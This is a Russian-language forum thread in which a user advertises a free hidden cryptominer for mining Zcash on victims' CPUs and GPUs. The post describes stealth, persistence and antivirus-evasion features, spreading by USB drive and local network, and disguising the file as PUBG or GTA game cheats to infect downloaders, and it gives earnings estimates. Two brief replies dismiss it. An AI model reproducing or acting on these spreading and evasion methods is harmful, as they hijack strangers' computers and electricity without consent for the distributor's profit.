Черная Скрытый майнер на CPU+GPU 2018 + Способы распространения!

Тема в разделе "Способы заработка", создана пользователем VALENOK, 07.02.18.Просмотров: 964

  1. VALENOK Новичок

    VALENOK

    1 сообщения
    3 симпатий
    0
    розыгрышей
    6 лет с нами
    2 месяца с нами
    11 дней с нами
    Вот и подоспела сборка скрытого майнера , после тестирования почти в пол месяца. Сборка работает как с CPU(процессор) так и с GPU(видеокарта).
    Плюсы моей сборки:
    + Майнер распространяется бесплатно! Почему бесплатно ? В теме написано.
    + Скрытая установка , никаких вам окошек.
    + Нагрузка майнера реагирует на дижение и работу пользователя, созданы 2 майнера , с разной нагрузкой , выбирайте на своё усмотрение.
    + Распространение через USB флешки, при подключение флешки на неё скидывается файл "Скрытые фото", пользователю остаётся только нажать на файл и - Опачки! , ещё один комп заражён.
    + Автоматическая рздача майнера на все компьютеры в локальной сети.
    + Автоопеределение 64 или 32 битная система.
    + Процесс не закрывается через диспетчер задач. Да и с другими программами удаления будут трудности. При открытии диспетчера майнер переходит в спящий режим . Спустя 5 минут диспетчер закрывается , дабы пользователь не наглел)
    + Нельзя удалить майнер стандартными способами windows .
    + Майнер не детектится всеми антивирусами , Касперский , Аваст и Авира не удаляют майнер , проблема только с Eset, в дальнейшем будет использоваться криптование файлов.
    + Майнер запускается без прав администратора.
    + Майнер прописывается в автозагрузку.
    + В майнер вшита утилита для повышения хеш-рейта.
    + Майнинг в режиме сна windows.
    + При обнаружении другого майнера в компьютере он удаляет его.
    + Все файлы имеют свои копии которые скрыты и находятся в рандомных местах компьютера, при удалении одного, он воссанавливается, а если удалить все, установщик создаст их снова.


    Монета , пул , кошелёк

    Теперь начнём подробнее . Майнер работает с криптовалютой ZCash , пул Home - zcash.flypool.org . Почему этот пул ? Да, потому, что автоматически выводятся на кошелёк 0.01 zcash и не нужно регистрации. Кошелёк можно использовать любой , с биржи , только не EXMO , у всех проблемы с этой биржей, можно на локальный кошелёк , я использую zcash4win, за время теста все деньги пришли.
    Почему майнер распространяется бесплатно ?
    Потому что 5 минут из часа вы майните на меня, остальные 55 минут вы майните себе, так вы мотивируете меня на развитие темы и модернизацию майнера, а я вам даю возможность заработать.
    Запуск майнера.
    Теперь перейдём к запуску майнера. Майнер работает как с 64 битными, так и с 32 битными системами. Чтобы вы не ждали моих ответов на сообщения, рядом с exe, который вы можете переименовывать как угодно, создайте txt файл, в нём в первой строке вы пишете только свой номер Zcash кошелька, после чего майнер запустится, подберёт и считает ваш номер кошелка. Можно после кошелька поставить точку и указать воркера , так будут называть все машины на которые вы скинете майнер , имя воркера может быть любым , пример t1gLipthrT7Bm5ULQKobcheJxNRQcVjnm6v.YourWorkerName. Проверяйте название файла txt, и чтобы ваш кошелёк был на первой строке! Для тех , кто хочет один только exe , пишите мне в личку или на email номер zcash кошелька, буду вшивать его в майнер.
    Распространение майнера.
    Был создан sfx архив для распространения. У вас должен быть установлен WinRAR. Скачиваете exe, ссылка Скрытый контент. Для просмотра Вы должны быть зарегистрированным участником Потом переходите в папку куда он скачался , нажимаете правой кнопкой мыши , открыть в WinRAR , открываете txt , удаляете мою надпись , вставляете номер кошелька , потом закрываете txt , нажимаете сохранить , на запрос обновить файл нажимаете да , всё, можете распространять , иконка архива игра PUBG . Можно распространять под названием читов.
    Пример распространения.
    Мануалов в интернете много по распространению, можете использовать читерские форумы , игровые , скидывать под видом программ . У читеров сейчас популярны PUBG и GTA , находите тему про какой-нибудь чит , копируете на другой форум , подставляете свой exe , всё. Можете создать раздачу какой-нибудь игры со своим exe .
    Заработок
    Можно намного больше получить чем я , всё зависит от скачивания и распространения . Пока я проводил тесты мои результаты: средний хэшрейт 850, т.е. как три gtx 1060 6gb ) Максимальные пики хэшрейта были до 2400 хэшей . Этого я добился за три дня , всего было 4 поста , всё зависит от скачивания . Выходит 215 $ в месяц , при курсе 7 $ за 0.01 zcash можно было почти 300$ в месяц получить , потом халявно закупать оборудование , но вот только окупаемость у оборудования 8-12 месяцев , а так можно быстрее заработать , только распространяя. Могу скриншоты показать , для неверующих)
    Обновление версий майнера
    Чтобы обновить майнер до новой версии , просто скачайте и запустите новую версию, либо майнер 0.7.0.0 или заниженный майнер 0.7.0.1. При запуске майнер перезапишется на более новую версию. Если у вас проблемы с обновлением , удалите майнер , а потом запустите снова, ссылки внизу.


    Cкачать майнер Скрытый контент. Для просмотра Вы должны быть зарегистрированным участником Текущая актуальная версия 0.7.0.0 (на дату 16.02.2018) Для обновления версии просто запустите exe, рядом должен быть txt с номером вашего zcash кошелька Майнер закриптован на дату 16.02.20 18, т.е. не удаляется антивирусами , проблемы могут быть только с Eset и windows defender на Win 10. Но, лучше отклюить антивирус на время нахождения файла на компьютере.


    Минимальные требования для майнера : любые процессоры , любые видеокарты nvidia от 1GB , windows 7.

    Максимальные характеристики не ограничены )

    Был создан ещё один майнер , отличие от версии 0.7.0.0 : при работе пользователя 1 ядро задействовано и 20% мощности видеокарты, при отсутствии пользователя 40 секунд включаются половина ядер, 90% мощности видеокарты )

    Cкачать заниженный майнер Скрытый контент. Для просмотра Вы должны быть зарегистрированным участником
    Текущая актуальная версия заниженного майнера 0.7.0.1 (на дату 16.02.2018) Майнер закриптован на дату 16.02.2018, т.е. не удаляется антивирусами , проблемы могут быть только с Eset и windows defender на Win 10. Но, лучше отклюить антивирус на время нахождения файла на компьютере.


    По требованию пользователей для портативности, возможных ошибок пользователя, майнер можно удалить через программу, ссылка Скрытый контент. Для просмотра Вы должны быть зарегистрированным участником


    Автор темы никого не побуждает повторять подобное. В противном случае ответственность будете нести исключительно вы. Тема создана в ознакомительных целях.


    Ну, удачной охоты, майнер!
     
    Последнее редактирование: 16.02.18
  2. Repachino Любопытный

    Repachino

    22 сообщения
    8 симпатий
    0
    розыгрышей
    6 лет с нами
    4 месяца с нами
    15 дней с нами
    -rep нужны права админа
     
  3. Чёрнокнижник Администратор | Повелитель китайцев

    Чёрнокнижник

    Администратор

    341 сообщения
    295 симпатий
    4
    розыгрышей
    6 лет с нами
    6 месяцев с нами
    2 дня с нами
    + Зря время потратил
     
  4. Repachino Любопытный

    Repachino

    22 сообщения
    8 симпатий
    0
    розыгрышей
    6 лет с нами
    4 месяца с нами
    15 дней с нами